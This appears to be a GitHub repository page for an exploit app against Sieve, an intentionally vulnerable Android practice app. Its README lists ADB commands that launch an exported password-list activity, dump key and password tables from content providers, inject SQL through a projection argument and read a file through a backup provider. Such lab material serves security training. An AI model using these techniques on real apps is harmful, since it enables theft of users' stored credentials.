Skip to content

an app which exploits several vulnerabilities in sieve.apk

Notifications You must be signed in to change notification settings

VAnD4L/sieve_pwn_max

Repository files navigation

sieve_pwn_max

how to invoke each function via ADB :

adb shell am start -n com.mwr.example.sieve/com.mwr.example.sieve.PWList

adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Keys/
adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords/
adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Keys/ --projection '* FROM Passwords;'
adb shell cat /data/data/com.mwr.example.sieve.FileBackupProvider/files/etc/hosts

About

an app which exploits several vulnerabilities in sieve.apk

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages